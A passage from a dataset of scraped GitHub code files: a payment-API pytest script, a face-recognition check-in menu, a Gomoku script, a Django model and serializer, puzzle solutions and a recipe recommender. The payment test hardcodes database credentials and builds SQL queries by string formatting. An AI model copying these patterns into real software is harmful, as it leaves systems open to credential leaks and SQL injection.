\"\").replace(\"\\r\", \"\")\n request_data = table.cell(i, 6).value.replace(\"\\n\", \"\").replace(\"\\r\", \"\")\n check_point = table.cell(i, 7).value.replace(\"\\n\", \"\").replace(\"\\r\", \"\")\n message = table.cell(i, 8).value.replace(\"\\n\", \"\").replace(\"\\r\", \"\")\n\n #list_data = [num, api_name, api_host, request_url, method, request_data_type, request_data, check_point, message] # 将execl用例各字段转换为列表\n 
#print(list_data)\n #return list_data # 返回列表,给其他函数调用\n try:\n # 调用接口请求方法,后面会讲到\n req_List = request_interface(num, api_name, api_host, request_url, method,\n request_data_type, request_data, check_point, message)\n #print(req_List)\n\n for req_msg in req_List:\n transactionNno = req_msg[0]\n businessCode = req_msg[1]\n state = req_msg[2]\n\n if businessCode != 'AliNative':\n # append只接收一个参数,所以要将四个参数括在一起,当一个参数来传递\n # 请求失败,则向error_cases中增加一条记录\n error_cases.append((transactionNno, businessCode, state, \"发起交易异常\"))\n #print(error_cases)\n except Exception as e:\n print(e)\n print(\"订单{}交易失败,请检查失败原因!\".format(transactionNno))\n # 访问异常,也向error_cases中增加一条记录\n error_cases.append((transactionNno, businessCode, state, \"发起交易异常\"))\n #print(error_cases)\n return error_cases\n\n\ndef request_interface(num, api_name, api_host, request_url, method,\n request_data_type, request_data, check_point, message):\n # 构造请求headers\n headers = { 'Content-Type': 'application/json; charset=UTF-8',\n 'x-efps-sign' : Encrypt.req_encrypt(request_data),\n 'x-efps-sign-no' : '20190906test10'\n }\n # 判断请求方式,如果是GET,则调用get请求,POST调post请求,都不是,则抛出异常\n if method == \"GET\":\n r = requests.get(url=api_host+request_url, params=json.loads(request_data), headers=headers)\n result_json = r.json() #引入json模板,将响应结果转变为字典格式\n return_Code = result_json['returnCode'] #获取响应返回的returnCode值\n if check_point == return_Code: # 断言,判断预期值是否与响应参数returnCode一致\n print(\"第{}条用例'{}'执行成功,结果返回值为\\n{}. \". format(num, api_name, r.text))\n return return_Code\n else:\n print(\"第{}条用例'{}'执行失败!!!结果返回值为\\n{}.\".format(num, api_name, r.text))\n return return_Code\n\n elif method == \"POST\":\n try:\n payload1 = json.dumps(request_data) # 接受python的基本数据类型,然后将其序列化为string\n payload2 = json.loads(payload1) # 接受一个合法字符串,然后将其反序列化为python的基本数据类型\n r = requests.post(url=api_host+request_url, data=payload2, headers=headers)\n result_r_json = r.json() # 引入json模板,将响应结果转变为字典格式\n print(result_r_json)\n outTradeNo = result_r_json['outTradeNo']\n return_Code = result_r_json['returnCode']\n casherUrl = result_r_json['casherUrl']\n print(casherUrl)\n if check_point == return_Code: # 断言,判断预期值是否与响应参数returnCode一致\n # logger = Log.loggerClass('debug')\n # logger.debug(\"第{}条用例'{}'执行成功,结果返回值为\\n{}.\".format(num, api_name, r.text),'debug')\n print(\"第{}条用例'{}'执行成功,结果返回值为\\n{}.\".format(num, api_name, r.text))\n open_Website(casherUrl) # 调用函数打开收银台并选择支付宝\n order_list = check_payMethod(outTradeNo) # 调用函数检查是否选择正确的支付方式\n for order_msg in order_list:\n #transaction_no = order_msg[0]\n business_code = order_msg[1]\n #state = order_msg[2]\n #print(business_code)\n if business_code == 'AliNative':\n print(\"支付方式选择正确!\")\n else:\n print(\"支付方式选择错误!\")\n else:\n print(\"第{}条用例'{}'执行失败!!!结果返回值为\\n{}.\".format(num, api_name, r.text))\n return order_list\n print(order_list)\n except Exception as e:\n print(e)\n else:\n print(\"第{}条用例'{}'请求方式有误!!!请确认字段【Method】值是否正确,正确值为大写的GET或POST。\".format(num, api_name))\n return 400, \"请求方式有误\"\n\n\n# 后台打开收银台并选择支付宝支付\ndef open_Website(url):\n # 创建chrome浏览器驱动,无头模式(后台打开收银台)\n chrome_options = Options()\n chrome_options.add_argument('--headless')\n driver = webdriver.Chrome(options = chrome_options)\n\n # 加载界面\n driver.get(url)\n time.sleep(2)\n\n #逐渐滚动浏览器窗口,令ajax逐渐加载\n # for i in range(0,10):\n # driver.execute_script('window.scrollTo(0, document.body.scrollHeight)')\n # i += 1\n # time.sleep(4)\n\n # 拿到页面源码\n html = driver.page_source\n #print(html)\n #driver.find_element_by_css_selector('body > div.main > div.main-body.j-main > div.main-content.j-platform-content > 
div > ul > li:nth-child(2) > img').click() #支付宝\n driver.find_element_by_css_selector('body > div.main > div.main - body.j - main > div.main - content.j - platform - content > div > ul > li: nth - child(2) > img').click() #支付宝\n # driver.find_element_by_css_selector('body > div.main > div.main-body.j-main > div.main-content.j-platform-content > div > ul > li:nth-child(1) > img').click() #微信\n\n time.sleep(3)\n driver.quit()\n\n\n# 连接数据库,查询支付方式是否选择成功\ndef check_payMethod(out_trade_no):\n #建立连接\n order_list = []\n conn = cx_Oracle.connect('efps01', 'efps01', '172.20.19.201:1521/testdb')\n cursor = conn.cursor() #创建游标\n res = cursor.execute('select transaction_no,business_code,state from TXS_PAY_TRADE_ORDER where out_trade_no = \\'{}\\''.format(out_trade_no)) #此处也可以使用%r,因为%r会给字符串加了单引号,才能作为sql的查询条件\n data = res.fetchall() #获取数据\n for transaction_no, business_code, state in data:\n if len(transaction_no) != 0:\n print(\"已选择支付方式\")\n else:\n print(\"未选择支付方式\")\n order_list.append((transaction_no, business_code, state))\n return order_list\n #print(order_list)\n cursor.close() #关闭游标\n conn.close() #关闭数据库连接\n\n\ndef test_getCase():\n # 执行所有测试用例,获取错误的用例\n error_cases = cases_in_excel(\"test_cashierPay_data.xlsx\")\n #error_cases = get_error_cases()\n # 如果有错误接口,则开始构造html报告\n if len(error_cases) > 0:\n # html = '接口自动化扫描,共有 ' + str(len(error_cases)) + ' 个异常接口,列表如下:' + '

'\n html = '主扫交易自动化测试,共有 ' + str(len(error_cases)) + ' 个异常交易,列表如下:' + '<table><tr><th>接口状态</th><th>接口地址</th><th>接口返回值</th></tr>
    '\n for test in error_cases:\n # html = html + ''\n html = html + ''\n Email.send_email(html)\n print(html)\n with open (\"G:/8.python/pytest_testApi/report/report.html\", \"w\") as f:\n f.write(html)\n else:\n print(\"本次测试,所有用例全部通过\")\n #send_email(\"本次测试,所有用例全部通过\")\n\n#\n#\nif __name__ == '__main__':\n #pytest.main(['--html=../report/report.html','test_cashierPay01.py'])\n # pytest.main([\"-s\", \"test_epspApi.py\", \"--pytest_report\", 'G:/8.python/pytest_testApi/report/report_' +datetime.datetime.today().strftime('%Y-%m-%d')+ '.html'])\n pytest.main([\"-s\", \"test_epspApi.py\", \"--pytest_report\", 'G:/8.python/pytest_testApi/report/report_' + time.strftime(\"%Y%m%d%H%M%S\",time.localtime(time.time())) + '.html'])\n\n","repo_name":"amnpt/EpspTest","sub_path":"testCase/test_epspApi.py","file_name":"test_epspApi.py","file_ext":"py","file_size_in_byte":12129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32387678104","text":"import subprocess\nimport sys\n\ndef get_platform():\n platforms = {\n 'linux1' : 'Linux',\n 'linux2' : 'Linux',\n 'darwin' : 'OS X',\n 'win32' : 'Windows'\n }\n \n if sys.platform not in platforms:\n return sys.platform\n \n return platforms[sys.platform]\n\n \ndef checkKey(d, k):\n if k in d:\n return True\n else:\n return False\n\ndef run(command:str):\n data = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n # print(data.args)\n # print(data.returncode)\n \n if data.returncode == 0:\n # print(data.stdout.decode())\n return {\"status\": True, \"result\" : data.stdout.decode()}\n else:\n # print(data.stderr.decode())\n return {\"status\": False, \"result\" : data.stderr.decode()}\n\n return data\n","repo_name":"HenriqueLuizz/inspetor-lestrade","sub_path":"src/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39159521772","text":"from src.core.model import *\nfrom src.core.barcode import *\nfrom src.core.date import *\nfrom src.core.webscraping import *\nfrom database.tables import *\nfrom database.database import Database\n\ndef sub_menu_options():\n print('1. Capturar fotos de estudiante')\n print('2. Actualizar sistema')\n print('3. Regresar')\n return int(input('Seleccionar opción: '))\n\ndef sub_menu():\n while True:\n opt = sub_menu_options()\n\n if opt == 1:\n print('Por favor, muestre el cósigo de barras del carnet...')\n barcode_detector = BarcodeDetector()\n barcode_detector.detect_barcodes()\n student_id = barcode_detector.get_id()\n db = Database()\n\n if db.student_exists(student_id):\n print('Este proceso es solo para nuevos estudiantes...')\n else:\n web_scraper = WebScraper(student_id)\n web_scraper.initialize_driver()\n student = web_scraper.scrape_student_data()\n\n db.insert_student(student)\n web_scraper.close_driver()\n print(student.name, ' agregado a la base de datos!')\n\n print('Para tomar fotos de tu rostro, por favor mire la cámara...')\n capture_frame = CaptureFrame(student_id)\n capture_frame.capture_faces()\n capture_frame.release_resources()\n print('Capturas de imágenes guardadas!')\n\n elif opt == 2:\n face_trainer = FaceRecognitionTrainer()\n face_trainer.train_model()\n\n elif opt == 3:\n print('Regresando...')\n break\n\n else:\n print('Esta opción no existe, inténtalo de nuevo.')\n\ndef menu_options():\n print('::::::: checkID :::::::')\n print('1. Comenzar')\n print('2. 
Opciones de administrador')\n print('3. Crear base de datos')\n print('4. Salir')\n return int(input('Seleccione una opción: '))\n\ndef menu():\n while True:\n option = menu_options()\n if option == 1:\n\n barcode_detector = BarcodeDetector()\n barcode_detector.detect_barcodes()\n id = int(barcode_detector.get_id())\n db = Database()\n if db.student_exists(id):\n print('Código validado')\n face_recognition = FaceRecognition(id)\n face_recognition.load_model()\n face_recognition.recognize_faces()\n if face_recognition.validated:\n date = CurrentDate()\n registration = Registration(id, date.get_current_date(), date.get_current_time())\n db.insert_registration(registration)\n print('Acceso otorgado!')\n else:\n print('El rostro no coincide')\n else:\n print('No eres de esta universidad')\n\n elif option == 2:\n sub_menu()\n\n elif option == 3:\n db = Database()\n db.create_tables()\n student1 = Student(21200026, 'rodrigo davila vasquez', 'ingeniería de software')\n student2 = Student(21200195, 'Kevin tupac aguero', 'ingeniería de software')\n db.insert_student(student1)\n db.insert_student(student2)\n\n elif option == 4:\n print('Saliendo del sistema...')\n break\n\n else:\n print('Esta opción no existe, intténtalo de nuevo')\n\nif __name__ == '__main__':\n menu()\n","repo_name":"diegoam11/check-id","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38825571812","text":"from __future__ import print_function\nimport pickle\nfrom game import Board, Game\nfrom mcts_pure import MCTSPlayer as MCTS_Pure\nfrom mcts_alphaZero import MCTSPlayer\nfrom police_value_net_numpy import PolicyValueNetNumpy\nfrom policy_value_net_pytorch import PolicyValueNet\n\nclass Human(object):\n def __init__(self):\n self.player = None\n\n def setPlayerInd(self, p):\n self.player = p\n\ndef run():\n n, width, height = 5, 8, 8\n model_file = 'best_policy_8_8_5.model'\n try:\n board = Board(width = width, height = height, n_in_row = n)\n game = Game(board)\n policy_param = pickle.load(open(model_file, 'rb'), encoding = 'bytes')\n bestPolicy = PolicyValueNetNumpy(width, height, policy_param)\n mctsPlayer = MCTSPlayer(bestPolicy.policyValueFn, cPuct = 5, nPlayout = 400)\n human = Human()\n game.startPlay(human, mctsPlayer, startPlayer = 1, isShown = 1)\n except KeyboardInterrupt:\n print('\\n\\rquit')\n\nif __name__ == '__main__':\n run()","repo_name":"Tokiwa-17/fiveInARow","sub_path":"human_play.py","file_name":"human_play.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70061105927","text":"from collections import defaultdict\n\nfrom utils.exceptions import SolutionNotFoundError\n\n\ndef get_digit_tuple(n: int) -> tuple[int, ...]:\n \"\"\"Get a 10-tuple of the digits of n.\"\"\"\n y = n\n dlist = [0] * 10\n while y != 0:\n d = y % 10\n dlist[d] += 1\n y //= 10\n return tuple(dlist)\n\n\ndef get_smallest_cube_with_five_perms() -> int:\n \"\"\"Get the smallest cube with 5 permutations that are also cube.\"\"\"\n tuples = defaultdict(set)\n max_n = 10000\n for n in range(max_n):\n cube = n**3\n tup = get_digit_tuple(cube)\n tuples[tup].add(cube)\n if len(tuples[tup]) == 5:\n return min(tuples[tup])\n raise SolutionNotFoundError(f\"No solution for 
n<{max_n}.\")\n","repo_name":"JohN100x1/Project-Euler","sub_path":"src/solutions/p062.py","file_name":"p062.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7292729889","text":"from rest_framework import serializers\n\nfrom .models import Product\n\nclass ProductSerializer(serializers.HyperlinkedModelSerializer):\n image = serializers.ImageField(\n max_length = None, allow_empty_file = False, allow_null = True, required = False) #requirements\n class Meta:\n model = Product\n fields = ('id', 'name', 'activity', 'country','mountains','description', 'price', 'image', 'price_table', 'category','description_long', 'product_url', 'location', 'slopes_easy', 'slopes_medium', 'slopes_hard', 'slopes_total', 'snow_mountain','snow_valley', 'rating_resort', 'rating_family' ,'rating_scenery', 'resort_map', 'peak_altitude')\n\n","repo_name":"rhribar/airjoy.io","sub_path":"api/product/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26149793970","text":"class Solution:\n def smallestBeautifulString(self, s: str, k: int) -> str:\n n = len(s)\n arr = [ord(ch) for ch in s]\n\n # since s has already been beautiful\n # for i position, we only need to check i-1 and i-2 position\n # i-1: AA palindrome\n # i-2: AXA palindrome\n def checkBautiful(arr, i):\n if i-1 >= 0 and arr[i-1] == arr[i]: # check AA palindrome\n return False\n if i-2 >= 0 and arr[i-2] == arr[i]: # check AXA palindrome\n return False\n return True\n \n for i in range(n-1, -1, -1):\n for ch in range(arr[i]+1, ord(\"a\")+k):\n arr[i] = ch\n if checkBautiful(arr, i):\n k = i+1\n \n while k < n:\n mod = 0\n arr[k] = ord(\"a\")+mod\n while not checkBautiful(arr, k):\n mod = (mod+1)%3\n arr[k] = ord(\"a\")+mod\n\n k += 1\n\n return \"\".join(chr(rune) for rune in arr)\n return \"\"\n","repo_name":"Vergil0327/leetcode-history","sub_path":"String/2663. 
Lexicographically Smallest Beautiful String/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9259114506","text":"from auditlog.models import AuditlogHistoryField\nfrom auditlog.registry import auditlog\nfrom django.db import models\nfrom django.db.models.signals import pre_save, post_save\nfrom django.dispatch import receiver\n\nfrom sme_ptrf_apps.core.models_abstracts import ModeloBase\nfrom .fornecedor import Fornecedor\nfrom .validators import cpf_cnpj_validation\nfrom ..status_cadastro_completo import STATUS_CHOICES, STATUS_COMPLETO, STATUS_INCOMPLETO\nfrom ...core.models import Associacao\n\n\nclass Despesa(ModeloBase):\n history = AuditlogHistoryField()\n\n associacao = models.ForeignKey(Associacao, on_delete=models.PROTECT, related_name='despesas', blank=True,\n null=True)\n\n numero_documento = models.CharField('Nº do documento', max_length=100, default='', blank=True)\n\n tipo_documento = models.ForeignKey('TipoDocumento', on_delete=models.PROTECT, blank=True, null=True)\n\n data_documento = models.DateField('Data do documento', blank=True, null=True)\n\n cpf_cnpj_fornecedor = models.CharField(\n \"CPF / CNPJ\", max_length=20, validators=[cpf_cnpj_validation]\n , blank=True, null=True, default=\"\"\n )\n\n nome_fornecedor = models.CharField(\"Nome do fornecedor\", max_length=100, default='', blank=True)\n\n tipo_transacao = models.ForeignKey('TipoTransacao', on_delete=models.PROTECT, blank=True, null=True)\n\n documento_transacao = models.CharField('Nº doc transação', max_length=100, default='', blank=True)\n\n data_transacao = models.DateField('Data da transacao', blank=True, null=True)\n\n valor_total = models.DecimalField('Valor Total', max_digits=8, decimal_places=2, default=0)\n\n valor_recursos_proprios = models.DecimalField('Valor pago com recursos próprios', max_digits=8, decimal_places=2,\n default=0)\n\n valor_original = models.DecimalField('Valor original', max_digits=8, decimal_places=2, default=0)\n\n status = models.CharField(\n 'status',\n max_length=15,\n choices=STATUS_CHOICES,\n default=STATUS_INCOMPLETO\n )\n\n @property\n def valor_ptrf(self):\n return self.valor_total - self.valor_recursos_proprios\n\n valor_ptrf.fget.short_description = 'Valor coberto pelo PTRF'\n\n def __str__(self):\n return f\"{self.numero_documento} - {self.data_documento} - {self.valor_total:.2f}\"\n\n def cadastro_completo(self):\n completo = self.tipo_documento and \\\n self.data_documento and \\\n self.cpf_cnpj_fornecedor and \\\n self.nome_fornecedor and \\\n self.tipo_transacao and \\\n self.data_transacao and \\\n self.valor_total > 0\n\n if completo and self.tipo_transacao.tem_documento:\n completo = completo and self.documento_transacao\n\n if completo and self.tipo_documento.numero_documento_digitado:\n completo = completo and self.numero_documento\n\n if completo:\n for rateio in self.rateios.all():\n completo = completo and rateio.status == STATUS_COMPLETO\n\n return completo\n\n def atualiza_status(self):\n cadastro_completo = self.cadastro_completo()\n status_completo = self.status == STATUS_COMPLETO\n if cadastro_completo != status_completo:\n self.save() # Força um rec'alculo do status.\n\n @classmethod\n def by_documento(cls, tipo_documento, numero_documento, cpf_cnpj_fornecedor, associacao__uuid):\n return cls.objects.filter(associacao__uuid=associacao__uuid).filter(\n 
cpf_cnpj_fornecedor=cpf_cnpj_fornecedor).filter(tipo_documento=tipo_documento).filter(\n numero_documento=numero_documento).first()\n class Meta:\n verbose_name = \"Despesa\"\n verbose_name_plural = \"Despesas\"\n\n\n@receiver(pre_save, sender=Despesa)\ndef proponente_pre_save(instance, **kwargs):\n instance.status = STATUS_COMPLETO if instance.cadastro_completo() else STATUS_INCOMPLETO\n\n\n@receiver(post_save, sender=Despesa)\ndef rateio_post_save(instance, created, **kwargs):\n # Existe um motivo para o fornecedor não ser uma FK nesse modelo e ele ser atualizado indiretamente\n # A existência da tabela de fornecedores é apenas para facilitar o preenchimento da despesa pelas associações\n # Alterações feitas por uma associação no nome de um fornecedor não deve alterar diretamente as despesas de outras\n if instance and instance.cpf_cnpj_fornecedor and instance.nome_fornecedor:\n Fornecedor.atualiza_ou_cria(cpf_cnpj=instance.cpf_cnpj_fornecedor, nome=instance.nome_fornecedor)\n\n\nauditlog.register(Despesa)\n","repo_name":"ollyvergithub/SME-PTRF-BackEnd","sub_path":"sme_ptrf_apps/despesas/models/despesa.py","file_name":"despesa.py","file_ext":"py","file_size_in_byte":4649,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"286272498","text":"\"\"\"\n see on psana\n /cds/sw/ds/ana/conda1/manage/bin/psconda.sh # lcls1\n /cds/sw/ds/ana/conda2/manage/bin/psconda.sh # lcls2\n see on s3df\n /sdf/group/lcls/ds/ana/sw/conda1/manage/bin/psconda.sh # lcls1\n /sdf/group/lcls/ds/ana/sw/conda2/manage/bin/psconda.sh # lcls2\n\n DIR_ROOT for repositories and logfiles through the environment variable:\n /reg/g/psdm # lcls\n /cds/group/psdm # lcls2\n /sdf/group/psdm # s3df ???\n\n DIR_PSDM\n /cds/group/psdm # on psana lcls2\n /cds/group/psdm # on sdflogin lcls2\n\n SIT_PSDM_DATA\n /sdf/data/lcls/ds/\n\n ffb data\n /sdf/data/lcls/drpsrcf/ffb/\n\nfrom psana.detector.dir_root import DIR_ROOT, DIR_REPO\n\"\"\"\nimport os\n\nHOSTNAME = os.getenv('HOSTNAME', None) # ex: pslogin02\nif HOSTNAME is None:\n import socket\n HOSTNAME = socket.gethostname()\n#print('TEST dir_root.HOSTNAME %s' % HOSTNAME)\n\nDIR_ROOT = os.getenv('DIR_PSDM') # /cds/group/psdm\nDIR_LOG_AT_START = os.path.join(DIR_ROOT, 'detector/logs/atstart/') # /cds/group/psdm/detector/logs/atstart\nDIR_REPO = os.path.join(DIR_ROOT, 'detector/calib2/constants') # common repository\nDIR_REPO_EPIX10KA = DIR_REPO\n#DIR_REPO_EPIX10KA = os.path.join(DIR_ROOT, 'detector/gains2/epix10ka/panels') # /cds/group/psdm/detector/gains2/epix10ka/panels\n#DIR_REPO_DARK_PROC = DIR_REPO\n#DIR_REPO_DARK_PROC = os.path.join(DIR_ROOT, 'detector/calib2') # /cds/group/psdm/detector/calib2\nDIR_DATA_TEST = os.path.join(DIR_ROOT, 'detector/data2_test') # /cds/group/psdm/detector/data2_test/\nDIR_REPO_CALIBMAN = DIR_REPO # prev: /cds/group/psdm/detector/calib2/constants/logs\n#DIR_LOG_CALIBMAN = os.path.join(DIR_ROOT, 'detector/logs/calibman/lcls2') # /cds/group/psdm/detector/logs/calibman/lcls2\n\n# for s3df\nDIR_DATA = os.getenv('SIT_PSDM_DATA', '/sdf/data/lcls/ds') # /sdf/data/lcls/ds/\nDIR_FFB = os.path.join(DIR_DATA, '../drpsrcf/ffb').replace('/ds/../','/') # '/sdf/data/lcls/drpsrcf/ffb'\n# EOF\n","repo_name":"slac-lcls/lcls2","sub_path":"psana/psana/detector/dir_root.py","file_name":"dir_root.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"16"} +{"seq_id":"70917028808","text":"import cv2\nimport datetime\nfrom pyzbar.pyzbar 
import decode \n\nCam = cv2.VideoCapture(0)\ndetector = cv2.QRCodeDetector()\nwhile True:\n _,img=Cam.read()\n data,one, _=detector.detectAndDecode(img)\n success, frame = Cam.read()\n if data:\n a=data\n break\n cv2.imshow('Smile!',img)\n if cv2.waitKey(1)==ord('v'):\n continue\n for captureinfomartions in decode(frame):\n #Convert Informations to text file\n Make_txt_file = open(\"Information.txt\", \"w\")\n Make_txt_file.write(f\"{captureinfomartions.data.decode('utf-8')}\\n\" )\n \n #Add the time and date when data is scanned\n Date = datetime.datetime.now()\n Make_txt_file.write(Date.strftime(\"Date: %m/%d/%y \\n\"))\n Make_txt_file.write(Date.strftime(\"Time: %H:%M:%S\")) \n Make_txt_file.close()\n\nCam.release(a)\ncv2.destroyAllWindows()","repo_name":"edgarpesguerrajr/Assignment10","sub_path":"10.1.py","file_name":"10.1.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"43494410943","text":"\"\"\"Tests for the submission metadata parser.\"\"\"\n\nfrom importlib.resources import files\nfrom os.path import join as pathjoin\nfrom pathlib import Path\nfrom shutil import copyfileobj\n\nimport pytest\n\nfrom aga.gradescope.metadata import (\n GradescopeAssignmentMetadata,\n GradescopeSubmissionMetadata,\n load_submission_metadata_from_path,\n)\n\n\ndef test_example_metadata_id(example_metadata: GradescopeSubmissionMetadata) -> None:\n \"\"\"Test that the example metadata file's id is correct.\"\"\"\n assert example_metadata.id == 123456\n\n\ndef test_example_metadata_upload(\n example_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that the example metadata file's upload is correct.\"\"\"\n assert example_metadata.submission_method == \"upload\"\n\n\ndef test_example_metadata_created_at(\n example_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that the example metadata file's created at is correct.\"\"\"\n time = example_metadata.created_at\n assert time.year == 2018\n assert time.month == 7\n assert time.day == 1\n assert time.hour == 14\n assert time.minute == 22\n assert time.second == 32\n\n\ndef test_example_metadata_previous_submissions(\n example_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that the example metadata file's previous submissions is empty.\"\"\"\n assert example_metadata.previous_submissions == []\n\n\ndef test_example_metadata_users(\n example_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that the example metadata file's previous user is correct.\"\"\"\n users = example_metadata.users\n assert len(users) == 1\n\n user = users[0]\n assert user.email == \"student@example.com\"\n assert user.id == 1234\n assert user.name == \"Student User\"\n\n\n@pytest.fixture(name=\"example_metadata_assignment\")\ndef fixture_example_metadata_assignment(\n example_metadata: GradescopeSubmissionMetadata,\n) -> GradescopeAssignmentMetadata:\n \"\"\"Get the example metadata's assignment object.\"\"\"\n return example_metadata.assignment\n\n\ndef test_example_assignment_metadata_name(\n example_metadata_assignment: GradescopeAssignmentMetadata,\n) -> None:\n \"\"\"Test that the example metadata's assignment's name is correct.\"\"\"\n assert example_metadata_assignment.title == \"Programming Assignment 1\"\n\n\n@pytest.fixture(name=\"late_due_date_metadata\")\ndef fixture_late_due_date_metadata(tmp_path: Path) -> GradescopeSubmissionMetadata:\n \"\"\"Get a path with the example metadata file from the gradescope 
documentation.\"\"\"\n path = pathjoin(tmp_path, \"metadata.json\")\n\n with files(\"tests.test_gradescope.resources\").joinpath( # type: ignore\n \"metadata_with_late_due_date.json\"\n ).open() as src:\n with open(path, \"w\", encoding=\"UTF-8\") as dest:\n copyfileobj(src, dest)\n\n return load_submission_metadata_from_path(path)\n\n\n@pytest.fixture(name=\"multiple_submission_metadata\")\ndef fixture_multiple_submission_metadata(\n tmp_path: Path,\n) -> GradescopeSubmissionMetadata:\n \"\"\"Get a path with the example metadata file from the gradescope documentation.\"\"\"\n path = pathjoin(tmp_path, \"metadata.json\")\n\n with files(\"tests.test_gradescope.resources\").joinpath( # type: ignore\n \"multiple_submission_metadata.json\"\n ).open() as src:\n with open(path, \"w\", encoding=\"UTF-8\") as dest:\n copyfileobj(src, dest)\n\n return load_submission_metadata_from_path(path)\n\n\ndef test_late_due_date(late_due_date_metadata: GradescopeSubmissionMetadata) -> None:\n \"\"\"Test that we properly loda late due dates.\"\"\"\n assert late_due_date_metadata.assignment.late_due_date is not None\n assert late_due_date_metadata.assignment.late_due_date.year == 2022\n assert late_due_date_metadata.assignment.late_due_date.month == 8\n\n\ndef test_multiple_submission(\n multiple_submission_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that we properly load previous submissions.\"\"\"\n assert len(multiple_submission_metadata.previous_submissions) == 4\n","repo_name":"nihilistkitten/aga","sub_path":"tests/test_gradescope/test_metadata.py","file_name":"test_metadata.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"26021583196","text":"# Задача 1\n# На столе лежат n монеток. Некоторые из них лежат вверх решкой, \n# а некоторые – гербом. Определите минимальное число монеток, \n# которые нужно перевернуть, чтобы все монетки были повернуты \n# вверх одной и той же стороной. 
Выведите минимальное количество \n# монет, которые нужно перевернуть\n# 5 -> 1 0 1 1 0\n# 2\n\nprint('----------------------------------')\ncount = int(input(\"Введите количество монет \"))\nprint(\"1 = орел, 0 = решка\")\n\ncoin = [0] * count # массив монет\ntails = 0 # кол-во решек\n\nfor i in range(0, count): # да, я мог написать вместо range -> count, но тогда бы я не смогу выводить счет монет \n coin[i] = int(input(f\"{i + 1} монета лежит вверх: \"))\n if coin[i] == 0:\n tails = tails + 1\n\nprint()\nif tails < (count / 2):\n print(tails)\nelse:\n print(count - tails)\nprint('----------------------------------')","repo_name":"GRxAK/Python_start","sub_path":"lesson_02/homework_01.py","file_name":"homework_01.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19008540681","text":"from django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http.response import JsonResponse\n\n# Imports to recommendations\nimport numpy as np\nimport nltk\nfrom nltk.stem.porter import PorterStemmer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport ast\nimport pandas as pd\nimport json\n\nps = PorterStemmer()\ncv = CountVectorizer(max_features = 5000, stop_words='english')\nrecetas = pd.read_csv('./RecomendApp/recetas.csv')\nrecetas = recetas[['_id', 'nombre', 'calorias', 'carbohidratos', 'categoria', 'grasa', 'proteina', 'tiempoPreparacion', 'ingredientes']]\n\ndef convert(obj):\n L = []\n for i in ast.literal_eval(obj):\n L.append(i['idIngrediente'])\n return L\n\ndef convert2(obj):\n L = []\n for i in json.loads(obj):\n if i['vegetarian'] == \"true\":\n L.append('vegetarian')\n else:\n L.append('novegetarian')\n\n if i['vegan'] == \"true\":\n L.append('vegan')\n else:\n L.append('novegan')\n\n if i['glutenFree'] == \"true\":\n L.append('glutenfree')\n else:\n L.append('noglutenfree')\n\n if i['dairyFree'] == \"true\":\n L.append('dairyfree')\n else:\n L.append('nodairyfree')\n\n if i['veryHealthy'] == \"true\":\n L.append('veryHealthy')\n else:\n L.append('noveryHealthy')\n\n return L\n\ndef convert3(obj):\n L = []\n L.append(str(obj))\n return L\n\ndef stem(text):\n y = []\n\n for i in text.split():\n y.append(ps.stem(i))\n return \" \".join(y)\n\ndef recommend(receta):\n recomend = []\n receta = int(receta)\n receta_index = new_df[new_df['_id'] == receta].index[0]\n distances = similarity[receta_index]\n recetas_list = sorted(list(enumerate(distances)), reverse=True, key=lambda x: x[1])[1:6]\n\n for i in recetas_list:\n recomend.append(recetas.iloc[i[0]]._id)\n\n return recomend\n\nrecetas['ingredientes'] = recetas['ingredientes'].apply(convert)\nrecetas['categoria'] = recetas['categoria'].apply(convert2)\n\nrecetas['categoria'] = recetas['categoria'].apply(lambda x:[i.replace(\" \",\"\") for i in x])\nrecetas['ingredientes'] = recetas['ingredientes'].apply(lambda x:[i.replace(\" \",\"\") for i in x])\n\nrecetas['calorias'] = recetas['calorias'].apply(convert3)\nrecetas['carbohidratos'] = recetas['carbohidratos'].apply(convert3)\nrecetas['grasa'] = recetas['grasa'].apply(convert3)\nrecetas['proteina'] = recetas['proteina'].apply(convert3)\nrecetas['tiempoPreparacion'] = recetas['tiempoPreparacion'].apply(convert3)\n\nrecetas['tags'] = recetas['calorias'] + recetas['carbohidratos'] + recetas['grasa'] + recetas['proteina'] + 